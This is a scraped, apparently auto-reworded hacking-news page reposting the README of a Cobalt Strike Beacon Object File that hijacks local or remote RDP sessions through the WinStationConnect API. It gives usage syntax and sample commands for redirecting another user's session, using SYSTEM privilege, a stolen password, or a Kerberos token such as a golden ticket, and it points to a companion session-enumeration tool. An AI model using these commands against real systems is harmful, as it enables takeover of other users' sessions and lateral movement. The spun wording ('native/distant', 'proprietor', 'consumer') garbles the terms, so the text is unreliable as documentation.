Wednesday, November 9, 2022
HomeHackerBOF - Cobalt Strike Beacon Object File (BOF) That Makes use of...

BOF – Cobalt Strike Beacon Object File (BOF) That Makes use of WinStationConnect API To Carry out Native/Distant RDP Session Hijacking




Cobalt Strike Beacon Object File (BOF) that makes use of WinStationConnect API to carry out native/distant RDP session hijacking. With a legitimate entry token / kerberos ticket (e.g., golden ticket) of the session proprietor, it is possible for you to to hijack the session remotely with out dropping any beacon/device on the goal server.

To enumerate classes regionally/remotely, you would use Quser-BOF.

Utilization

Utilization: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command Description
-------- -----------
password Specifies the password of the consumer who owns the session to which you need to join.
server Specifies the distant server that you simply need to carry out RDP hijacking.

Pattern utilization
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2

Redirect session 2 to session 1 with password of the consumer who owns the session 2 (require excessive integrity beacon):
bof-rdphijack 1 2 password [email protected]

Redirect session 2 to session 1 for a distant server (require token/ticket of the consumer who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.inside

Compile

make

Reference

tscon.exe



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments